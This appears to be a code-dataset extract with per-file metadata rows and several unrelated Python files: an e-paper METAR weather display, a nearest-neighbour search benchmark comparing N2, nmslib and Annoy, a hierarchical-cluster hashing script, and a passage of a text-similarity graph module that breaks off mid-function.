| 0.461929
| 0.051471
| 0.05
| 0.042647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002667
| 0.119718
| 1,704
| 57
| 77
| 29.894737
| 0.904
| 0.349765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c43222bbb55fdc6b4f2d6c2fab0d2b77fcb11ea
| 3,278
|
py
|
Python
|
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
import datetime
import os
import textwrap
import click
from PIL import Image, ImageDraw, ImageFont
from metarmap.configuration import config, debug, get_display_lock_content, set_display_lock_content
from metarmap.libraries.aviationweather import metar
from metarmap.libraries.waveshare_epd import epd2in13_V2
FONTDIR = os.path.abspath('/usr/share/fonts/truetype/freefont/')
FONT = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 13)
FONT_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 13)
FONT_TITLE = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 15)
FONT_TITLE_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 15)
@click.command()
def clear_display():
""" Clear the ePaper display """
debug('Clear e-paper display')
epd = epd2in13_V2.EPD()
epd.init(epd.FULL_UPDATE)
epd.Clear(0xFF)
@click.command()
def update_display():
""" Update the ePaper display with current METAR observation """
# Fetch Observation
station = config['SCREEN'].get('airport', None)
debug(f'Selected airport for e-paper display: {station}')
if not station:
return
try:
observation = metar.retrieve([station, ])[0]
debug(f'Fetched latest weather for station {station}')
except IndexError:
debug(f'Weather not found for station {station}')
return
# Convert observation time to local (system) timezone
timezone = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
timezone_name = datetime.datetime.now(datetime.timezone.utc).astimezone().tzname()
observation_time_local = observation.get('observation_time').astimezone(timezone)
# Test observation_time, do not update display if weather observation is not new
new_lock = f'{station}{observation.get("observation_time")}'
old_lock = get_display_lock_content()
if new_lock == old_lock:
debug(f'New weather {new_lock} is the same as old weather {old_lock}. Not updating e-ink display')
return
debug(f'New weather {new_lock} supersedes old weather {old_lock}. Saving in lockfile.')
set_display_lock_content(new_lock)
# Initialize Display
debug('Initialize e-paper display')
epd = epd2in13_V2.EPD()
display_width = epd.height
display_height = epd.width
epd.init(epd.FULL_UPDATE)
image = Image.new('1', (display_width, display_height), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
# Title
debug('Draw title on e-paper display')
draw.rectangle(((0, 0), (display_width / 2, 22)), fill=0)
draw.text((2, 0), f'METAR {station}', font=FONT_TITLE_BOLD, fill=255)
msg = observation_time_local.strftime('%m/%d/%y %H:%M') + timezone_name[0]
w, h = FONT_TITLE.getsize(msg)
draw.text(((display_width - w - 2), 0), msg, font=FONT_TITLE)
draw.line(((0, 22), (display_width, 22)), fill=0, width=1)
# METAR Text
debug('Write raw METAR text to e-paper display')
line_pos = 40
msg = observation.get('raw_text')
w, h = FONT.getsize(msg)
for line in textwrap.wrap(msg, width=34):
draw.text((0, line_pos), line, font=FONT)
line_pos += h + 3
debug('Flush buffered image to e-paper display')
epd.display(epd.getbuffer(image))
| 38.116279
| 106
| 0.701647
| 457
| 3,278
| 4.908096
| 0.293217
| 0.01605
| 0.034775
| 0.041017
| 0.194383
| 0.176549
| 0.156041
| 0.087383
| 0.047258
| 0
| 0
| 0.020679
| 0.173887
| 3,278
| 85
| 107
| 38.564706
| 0.807607
| 0.088469
| 0
| 0.140625
| 0
| 0
| 0.219939
| 0.027282
| 0
| 0
| 0.001347
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.125
| 0
| 0.203125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c460fdfda615228be90ea72ed8b2f5c151649c7
| 16,921
|
py
|
Python
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 2
|
2019-02-13T12:59:27.000Z
|
2020-01-28T02:02:47.000Z
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 2
|
2019-06-25T10:00:57.000Z
|
2019-10-26T14:55:23.000Z
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 1
|
2021-11-03T14:59:27.000Z
|
2021-11-03T14:59:27.000Z
|
# This code is based on the code
# from ann-benchmark repository
# created by Erik Bernhardsson
# https://github.com/erikbern/ann-benchmarks
import gzip
import numpy
import time
import os
import multiprocessing
import argparse
import pickle
import resource
import random
import math
import logging
import shutil
import subprocess
import sys
import tarfile
from contextlib import closing
try:
xrange
except NameError:
xrange = range
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
from n2 import HnswIndex
n2_logger = logging.getLogger("n2_benchmark")
n2_logger.setLevel(logging.INFO)
# Set resource limits to prevent memory bombs
memory_limit = 12 * 2**30
soft, hard = resource.getrlimit(resource.RLIMIT_DATA)
if soft == resource.RLIM_INFINITY or soft >= memory_limit:
n2_logger.info('resetting memory limit from {0} to {1}. '.format(soft, memory_limit))
resource.setrlimit(resource.RLIMIT_DATA, (memory_limit, hard))
INDEX_DIR='indices'
DATA_DIR = './datasets/'
GLOVE_DIR = DATA_DIR + 'glove.txt'
SIFT_DIR = DATA_DIR + 'sift.txt'
YOUTUBE_DIR = DATA_DIR + 'youtube.txt'
class BaseANN(object):
def use_threads(self):
return True
class BruteForceBLAS(BaseANN):
"""kNN search that uses a linear scan = brute force."""
def __init__(self, metric, precision=numpy.float32):
if metric not in ('angular', 'euclidean'):
raise NotImplementedError("BruteForceBLAS doesn't support metric %s" % metric)
self._metric = metric
self._precision = precision
self.name = 'BruteForceBLAS()'
def fit(self, X):
"""Initialize the search index."""
lens = (X ** 2).sum(-1) # precompute (squared) length of each vector
if self._metric == 'angular':
X /= numpy.sqrt(lens)[..., numpy.newaxis] # normalize index vectors to unit length
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
elif self._metric == 'euclidean':
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
self.lengths = numpy.ascontiguousarray(lens, dtype=self._precision)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
def query(self, v, n):
"""Find indices of `n` most similar vectors from the index to query vector `v`."""
v = numpy.ascontiguousarray(v, dtype=self._precision) # use same precision for query as for index
# HACK we ignore query length as that's a constant not affecting the final ordering
if self._metric == 'angular':
# argmax_a cossim(a, b) = argmax_a dot(a, b) / |a||b| = argmin_a -dot(a, b)
dists = -numpy.dot(self.index, v)
elif self._metric == 'euclidean':
# argmin_a (a - b)^2 = argmin_a a^2 - 2ab + b^2 = argmin_a a^2 - 2ab
dists = self.lengths - 2 * numpy.dot(self.index, v)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
indices = numpy.argpartition(dists, n)[:n] # partition-sort by distance, get `n` closest
return sorted(indices, key=lambda index: dists[index]) # sort `n` closest into correct order
class N2(BaseANN):
def __init__(self, m, ef_construction, n_threads, ef_search, metric):
self._m = m
self._m0 = m * 2
self._ef_construction = ef_construction
self._n_threads = n_threads
self._ef_search = ef_search
self._index_name = os.path.join(INDEX_DIR, "n2_%s_M%d_efCon%d_n_thread%s_data_size%d" % (args.dataset, m, ef_construction, n_threads, max(args.data_size, 0)))
self.name = "N2_M%d_efCon%d_n_thread%s_efSearch%d" % (m, ef_construction, n_threads, ef_search)
self._metric = metric
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
if self._metric == 'euclidean':
self._n2 = HnswIndex(X.shape[1], 'L2')
else:
self._n2 = HnswIndex(X.shape[1])
if os.path.exists(self._index_name):
n2_logger.info("Loading index from file")
self._n2.load(self._index_name)
else:
n2_logger.info("Index file is not exist: {0}".format(self._index_name))
n2_logger.info("Start fitting")
for i, x in enumerate(X):
self._n2.add_data(x.tolist())
self._n2.build(m=self._m, max_m0=self._m0, ef_construction=self._ef_construction, n_threads=self._n_threads)
self._n2.save(self._index_name)
def query(self, v, n):
return self._n2.search_by_vector(v.tolist(), n, self._ef_search)
def __str__(self):
return self.name
class NmslibReuseIndex(BaseANN):
def __init__( self, metric, method_name, index_param, save_index,query_param):
self._nmslib_metric = {
'angular': 'cosinesimil',
'euclidean': 'l2'}[metric]
self._method_name = method_name
self._save_index = save_index
self._index_param = index_param
self._query_param = query_param
self.name = 'Nmslib(method_name=%s, index_param=%s, query_param=%s)' % (
method_name, index_param, query_param)
self._index_name = os.path.join(
INDEX_DIR, "youtube_nmslib_%s_%s_%s_data_size_%d" %
(self._method_name, metric, '_'.join(
self._index_param), max(args.data_size, 0)))
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import nmslib
self._index = nmslib.init(
self._nmslib_metric,
[],
self._method_name,
nmslib.DataType.DENSE_VECTOR,
nmslib.DistType.FLOAT)
for i, x in enumerate(X):
nmslib.addDataPoint(self._index, i, x.tolist())
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
nmslib.loadIndex(self._index, self._index_name)
else:
logging.debug("Create Index")
nmslib.createIndex(self._index, self._index_param)
if self._save_index:
nmslib.saveIndex(self._index, self._index_name)
nmslib.setQueryTimeParams(self._index, self._query_param)
def query(self, v, n):
import nmslib
return nmslib.knnQuery(self._index, n, v.tolist())
def freeIndex(self):
import nmslib
nmslib.freeIndex(self._index)
class Annoy(BaseANN):
def __init__(self, metric, n_trees, search_k):
self._n_trees = n_trees
self._search_k = search_k
self._metric = metric
self._index_name = os.path.join(
INDEX_DIR, "youtube_annoy_%s_tree%d_data_size_%d" %
(metric, n_trees, max(args.data_size, 0)))
self.name = 'Annoy(n_trees=%d, search_k=%d)' % (n_trees, search_k)
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import annoy
self._annoy = annoy.AnnoyIndex(f=X.shape[1], metric=self._metric)
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
self._annoy.load(self._index_name)
else:
logging.debug("Index file not exist start fitting!!")
for i, x in enumerate(X):
self._annoy.add_item(i, x.tolist())
self._annoy.build(self._n_trees)
self._annoy.save(self._index_name)
def query(self, v, n):
return self._annoy.get_nns_by_vector(v.tolist(), n, self._search_k)
def run_algo(args, library, algo, results_fn):
pool = multiprocessing.Pool()
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state = args.random_state)
pool.close()
pool.join()
t0 = time.time()
algo.fit(X_train)
build_time = time.time() - t0
n2_logger.info('Built index in {0}'.format(build_time))
best_search_time = float('inf')
best_precision = 0.0 # should be deterministic but paranoid
try_count = args.try_count
for i in xrange(try_count): # Do multiple times to warm up page cache, use fastest
results = []
search_time = 0.0
current_query = 1
total_queries = len(queries)
for j in range(total_queries):
v, correct = queries[j]
sys.stdout.write("Querying: %d / %d \r" % (current_query, total_queries))
t0 = time.time()
found = algo.query(v, GT_SIZE)
search_time += (time.time() - t0)
if len(found) < len(correct):
n2_logger.info('found: {0}, correct: {1}'.format(len(found), len(correct)))
current_query += 1
results.append(len(set(found).intersection(correct)))
k = float(sum(results))
search_time /= len(queries)
precision = k / (len(queries) * GT_SIZE)
best_search_time = min(best_search_time, search_time)
best_precision = max(best_precision, precision)
sys.stdout.write('*[%d/%d][algo: %s] search time: %s, precision: %.5f \r' % (i+1, try_count, str(algo), str(search_time), precision))
sys.stdout.write('\n')
output = [library, algo.name, build_time, best_search_time, best_precision]
n2_logger.info(str(output))
f = open(results_fn, 'a')
f.write('\t'.join(map(str, output)) + '\n')
f.close()
n2_logger.info('Summary: {0}'.format('\t'.join(map(str, output))))
def get_dataset(which='glove', data_size=-1, test_size = 10000, random_state = 3):
cache = 'queries/%s-%d-%d-%d.npz' % (which, max(args.data_size, 0), test_size, random_state)
if os.path.exists(cache):
v = numpy.load(cache)
X_train = v['train']
X_test = v['test']
n2_logger.info('{0} {1}'.format(X_train.shape, X_test.shape))
return X_train, X_test
local_fn = os.path.join('datasets', which)
if os.path.exists(local_fn + '.gz'):
f = gzip.open(local_fn + '.gz')
else:
f = open(local_fn + '.txt')
X = []
for i, line in enumerate(f):
v = [float(x) for x in line.strip().split()]
X.append(v)
if data_size != -1 and len(X) == data_size:
break
X = numpy.vstack(X)
import sklearn.cross_validation
# Here Erik is most welcome to use any other random_state
# However, it is best to use a new random seed for each major re-evaluation,
# so that we test on a trully bind data.
X_train, X_test = sklearn.cross_validation.train_test_split(X, test_size=test_size, random_state=random_state)
X_train = X_train.astype(numpy.float)
X_test = X_test.astype(numpy.float)
numpy.savez(cache, train=X_train, test=X_test)
return X_train, X_test
def get_queries(args):
n2_logger.info('computing queries with correct results...')
bf = BruteForceBLAS(args.distance)
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state=args.random_state)
# Prepare queries
bf.fit(X_train)
queries = []
total_queries = len(X_test)
for x in X_test:
correct = bf.query(x, GT_SIZE)
queries.append((x, correct))
sys.stdout.write('computing queries %d/%d ...\r' % (len(queries), total_queries))
sys.stdout.write('\n')
return queries
def get_fn(base, args):
fn = os.path.join(base, args.dataset)
if args.data_size != -1:
fn += '-%d' % args.data_size
if args.test_size != -1:
fn += '-%d' % args.test_size
fn += '-%d' % args.random_state
if os.path.exists(fn + '.gz'):
fn += '.gz'
else:
fn += '.txt'
d = os.path.dirname(fn)
if not os.path.exists(d):
os.makedirs(d)
return fn
def download_file(url, dst):
file_name = url.split('/')[-1]
with closing(urlopen(url)) as res:
with open(dst+"/"+file_name, 'wb') as f:
file_size = int(res.headers["Content-Length"])
sys.stdout.write("Downloading datasets %s\r" % (file_name))
file_size_dl = 0
block_sz = 10240
while True:
buffer = res.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
sys.stdout.write("Downloading datasets %s: %d / %d bytes\r" % (file_name, file_size_dl, file_size))
sys.stdout.write('\n')
if __name__ == '__main__':
global GT_SIZE
parser = argparse.ArgumentParser()
parser.add_argument('--distance', help='Distance metric', default='angular')
parser.add_argument('--try_count', help='Number of test attempts', type=int, default=3)
parser.add_argument('--dataset', help='Which dataset', default='glove')
parser.add_argument('--data_size', help='Maximum # of data points', type=int, default=-1)
parser.add_argument('--test_size', help='Maximum # of data queries', type=int, default=10000)
parser.add_argument('--n_threads', help='Number of threads', type=int, default=10)
parser.add_argument('--random_state', help='Random seed', type=int, default=3)
parser.add_argument('--algo', help='Algorithm', type=str)
args = parser.parse_args()
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
numpy.random.seed(args.random_state)
if args.dataset == 'glove':
GT_SIZE = 10
elif args.dataset == 'sift':
GT_SIZE = 10
elif args.dataset == 'youtube':
GT_SIZE = 100
else:
print('Invalid dataset: {}'.format(args.dataset))
exit(0)
print('* GT size: {}'.format(GT_SIZE))
if args.dataset == 'glove' and not os.path.exists(GLOVE_DIR):
download_file("https://s3-us-west-1.amazonaws.com/annoy-vectors/glove.twitter.27B.100d.txt.gz", "datasets")
with gzip.open('datasets/glove.twitter.27B.100d.txt.gz', 'rb') as f_in, open('datasets/glove.twitter.27B.100d.txt', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
subprocess.call("cut -d \" \" -f 2- datasets/glove.twitter.27B.100d.txt > datasets/glove.txt", shell=True)
if args.dataset == 'sift' and not os.path.exists(SIFT_DIR):
download_file("ftp://ftp.irisa.fr/local/texmex/corpus/sift.tar.gz", "datasets")
with tarfile.open("datasets/sift.tar.gz") as t:
t.extractall(path="datasets")
subprocess.call("python datasets/convert_texmex_fvec.py datasets/sift/sift_base.fvecs >> datasets/sift.txt", shell=True)
if args.dataset == 'youtube' and not os.path.exists(YOUTUBE_DIR):
raise IOError('Please follow the instructions in the guide to download the YouTube dataset.')
results_fn = get_fn('results', args)
queries_fn = get_fn('queries', args)
logging.info('storing queries in {0} and results in {1}.'.format(queries_fn, results_fn))
if not os.path.exists(queries_fn):
queries = get_queries(args)
with open(queries_fn, 'wb') as f:
pickle.dump(queries, f)
else:
queries = pickle.load(open(queries_fn, 'rb'))
logging.info('got {0} queries'.format(len(queries)))
algos = {
'annoy': [ Annoy('angular', n_trees, search_k)
for n_trees in [10, 50, 100]
for search_k in [ 7, 3000, 50000, 200000, 500000]
],
'n2': [ N2(M, ef_con, args.n_threads, ef_search, 'angular')
for M, ef_con in [ (12, 100)]
for ef_search in [1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2500, 5000, 10000, 100000]
],
'nmslib': []}
MsPostsEfs = [
({'M': 12,
'post': 0,
'indexThreadQty': args.n_threads,
'delaunay_type': 2,
'efConstruction': 100,
},
[1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2000, 2500],
),
]
for oneCase in MsPostsEfs:
for ef in oneCase[1]:
params = ['%s=%s' % (k, str(v)) for k, v in oneCase[0].items()]
algos['nmslib'].append(
NmslibReuseIndex( 'angular', 'hnsw', params, True, ['ef=%d' % ef]))
algos_flat = []
if args.algo:
print('running only: %s' % str(args.algo))
algos = {args.algo: algos[args.algo]}
for library in algos.keys():
for algo in algos[library]:
algos_flat.append((library, algo))
random.shuffle(algos_flat)
logging.debug('order: %s' % str([a.name for l, a in algos_flat]))
for library, algo in algos_flat:
logging.info(algo.name)
# Spawn a subprocess to force the memory to be reclaimed at the end
p = multiprocessing.Process(target=run_algo, args=(args, library, algo, results_fn))
p.start()
p.join()
| 37.602222
| 166
| 0.61929
| 2,345
| 16,921
| 4.282303
| 0.183369
| 0.027783
| 0.020713
| 0.013444
| 0.251643
| 0.193487
| 0.141207
| 0.108445
| 0.095399
| 0.078371
| 0
| 0.020641
| 0.249867
| 16,921
| 449
| 167
| 37.685969
| 0.770503
| 0.069499
| 0
| 0.192308
| 0
| 0.008242
| 0.129106
| 0.026165
| 0
| 0
| 0
| 0
| 0.005495
| 1
| 0.054945
| false
| 0
| 0.068681
| 0.010989
| 0.164835
| 0.008242
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c51be6bea74f985c0302d56a6e42f0067e94f0f
| 4,287
|
py
|
Python
|
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | 1
|
2021-12-14T10:19:55.000Z
|
2021-12-14T10:19:55.000Z
|
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | null | null | null |
K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py
|
cultural-ai/ConConCor
|
f5c30dfb7d38392f492f9c6e44c8d242f2820ce4
|
[
"CC-BY-2.0"
] | null | null | null |
"""{Build token: cluster index}, hashes for each specified granularity level in the user-defined list 'clustering_levels_to_consider'
Output: level_xx_hash.json hash to /cluster_hashes
"""
import json
import os
import pickle as pkl
import typing
import numpy as np
def main():
#
# user-defined vars
#
clustering_levels_to_consider = [12]
# consider different cluster granulaties, i.e., snip level from leaf
for clustering_level in clustering_levels_to_consider:
# load the linkage matrix
sav_linkages = "heirarchical_clustering/linkage_matrix.pkl"
with open(sav_linkages, "rb") as f:
z: np.ndarray = pkl.load(f)
# load the list of tokens (which corresponds to the linkage matrix)
# i.e., i in tokens[i], corresponds to cluster i referenced in z[:,0:2]
sav_tokens = "heirarchical_clustering/tokens.json"
with open(sav_tokens, "rb") as f:
tokens: list = json.load(f)
# see link, below, on interpreting z, i.e., cluster_index1, cluster_index2, dist, cluster size
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.fcluster.html
clusters: typing.Generator = gen_clusters(
level=clustering_level, z=z, tokens=tokens
) # generator of (cluster_index, list of tokens) of each cluster for the current cut 'level'
# build a hash, to translate token to cluster index for given granularity
h: dict = {
token: cluster_index
for cluster_index, cluster in clusters
for token in cluster
}
# save
sav = f"cluster_hashes/level_{clustering_level}_hash.json"
os.makedirs(os.path.dirname(sav), exist_ok=True)
with open(sav, "w") as f:
json.dump(h, f, indent=4)
def gen_clusters(level: int = 1, *, z: np.ndarray, tokens: list) -> typing.Generator:
"""Return a generator of (cluster_index, list of tokens) of each cluster
for the current cut 'level'.
"""
# add an 'operation index' column to z
x: np.ndarray = np.hstack(
(z, np.array([i for i in range(z.shape[0])]).reshape(-1, 1))
)
# note: cluster_index = x[:,4] + len(tokens) is the index of the cluster created by the operation
# cluster indices 0 to len(tokens) - 1, corresponds to the individual tokens
#
# iterate over each cut level (from leafs) until at specified 'level'
# and collect z_rows_of_interest, an iterable of z row indices, representing the clusters wrt., cut 'level'
#
seen_z_rows = [] # all z row clusters seen in previous levels
seen_cluster_indices = [index for index, token in enumerate(tokens)]
for i in range(1, level + 1): # i.e., cluster 1 to level
x_dropped: np.ndarray = np.delete(
x, seen_z_rows, axis=0
) # i.e., drop clusters seen at previous level
x_i: np.ndarray = x_dropped[
[row.all() for row in np.isin(x_dropped[:, 0:2], seen_cluster_indices)]
] # the bit of x that lists the clusters in the current cut level, i.e., those clusters that reference only previously seen cluster_indices
z_rows_of_interest: np.ndarray = x_i[:, 4].astype(int)
seen_z_rows += [row for row in z_rows_of_interest]
seen_cluster_indices += [z_row + len(tokens) for z_row in x_i[:,4]]
# generate a (cluster_index, list of tokens) for each cluster of the current cut 'level'
for row in z_rows_of_interest:
cluster_index = int(x[row, 4]) + len(
tokens
) # i.e., the 'true' cluster indices of z[row,4] + len(tokens) - 1
yield (
cluster_index,
cluster_index_to_tokens(cluster_index, z=z, tokens=tokens),
)
def cluster_index_to_tokens(cluster_index: int, *, z: np.ndarray, tokens: list) -> list:
"""Return a list of tokens corresponding to a cluster index (as per z[:, 0:2]) values."""
if cluster_index < len(tokens):
return [tokens[cluster_index]]
else:
c1, c2 = z[cluster_index - len(tokens), 0:2].astype(int)
return cluster_index_to_tokens(
c1, z=z, tokens=tokens
) + cluster_index_to_tokens(c2, z=z, tokens=tokens)
if __name__ == "__main__":
main()
| 37.278261
| 148
| 0.648239
| 629
| 4,287
| 4.265501
| 0.254372
| 0.089452
| 0.022363
| 0.020872
| 0.116288
| 0.092434
| 0.06858
| 0.051435
| 0.051435
| 0.051435
| 0
| 0.010284
| 0.251458
| 4,287
| 114
| 149
| 37.605263
| 0.825802
| 0.405878
| 0
| 0
| 0
| 0
| 0.055667
| 0.050461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c5554bd05cd5239ce11e4e4dd8fa2e50df67f34
| 7,444
|
py
|
Python
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-05-20T20:53:19.000Z
|
2021-05-20T20:53:19.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | 1
|
2021-04-06T08:34:05.000Z
|
2021-11-24T10:47:27.000Z
|
code/reveal_links.py
|
antonia42/DeLi
|
f07dc79a98eebccbcdcb4ee74eb4570190e6f441
|
[
"MIT"
] | null | null | null |
import sys
import networkx as nx
#from simhash import Simhash, SimhashIndex
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
# if there is a problem with gensim and Word2Vec, check the python version
# to be 2.7
# print('Hello from {}'.format(sys.version))
# TF-IDF helper function
def reveal_similar_links(G, cids, contents, threshold=0.5):
"""
Function to calculate the TF-IDF vectors for all tweet/contents and then it
calculates the cosine similarity for all pairs. It returns the graph with
edges between the similar tweet-nodes, when the cosine similarity for a
pair of tweet-nodes is above a threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
cids (list): The list with the tweet ids from the tweet-nodes of the
graph.
contents (list): The list with the preprocessed content from the tweet-
nodes. Indexing is the same as in the 'cids' list.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The enriched graph instance (networkx.Graph()), after revealing the
hidden edges between similar tweet-nodes.
"""
try:
tfidf = TfidfVectorizer(norm='l2', max_features=1000)
tf_idf_matrix = tfidf.fit_transform(contents)
tf_idf_matrix.todense()
pairwise_similarity = tf_idf_matrix * tf_idf_matrix.T
cos_matrix = (pairwise_similarity).A
tsize = len(contents)
for i in range(0, tsize):
for j in range(i+1, tsize):
# similarity score is in [-1, 1]
sim_score = cos_matrix[i][j]
if sim_score > threshold:
# reveal hidden edge (between similar tweet-nodes)
G.add_edge(cids[i], cids[j], edgetype='similarTo')
except:
pass
return G
# Add edges between all pairs of similar content nodes based on TFIDF
def reveal_hidden_links_tfidf(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based only
on TF-IDF vectors and a cosine similarity threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
cids = content_dict.keys()
contents = content_dict.values()
return reveal_similar_links(G, cids, contents, threshold)
# Creates w-shingles for SimHash
def get_shingles(sentence, n):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
sentence (str): The sentence (preprocessed text from a tweet-node),
from which the shingles will be created.
n (int): The size of the shingle. In this case, the size is always set
to be three, and it means that all possible tuples with three
consecutive words will be created.
Returns:
A list with all triples made by consecutive words in a sentence.
"""
s = sentence.lower()
return [s[i:i + n] for i in range(max(len(s) - n + 1, 1))]
# Add edges between all pairs of similar content nodes based on SimHash
def reveal_hidden_links_simhash(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
objs = []
for cid, content in content_dict.items():
objs.append((cid, Simhash(get_shingles(content, 3), f=1)))
index = SimhashIndex(objs, f=1, k=2)
for key in index.bucket:
bucket_item = index.bucket[key]
contents = []
cids = []
for item in bucket_item:
newid = str(item.split(',')[-1])
contents.append(content_dict[newid])
cids.append(newid)
G = reveal_similar_links(G, cids, contents, threshold)
return G
# Add edges between all pairs of similar content nodes based on word2vec
def reveal_hidden_links_w2v(G, content_dict, threshold, model, k=3):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
Word2Vec enriched TF-IDF vectors and a cosine similarity threshold. More
specifically, for each word in a tweet, we add the 'k' most similar words
according to the pre-trained Word2Vec model.
Note: If you need to speed up the code during experimentation, it is better
to calculate the Word2Vec enriched text and cache it.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
model (gensim.models.KeyedVectors()): The Google's pre-trained
Word2Vec model.
k (int): The number of similar words to add.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
contents = content_dict.values()
cids = content_dict.keys()
enriched_contents = []
for c in contents:
words = c.split(' ')
enriched_list = []
for w in words:
try:
w2v_sim_list = model.most_similar(w, topn=k)
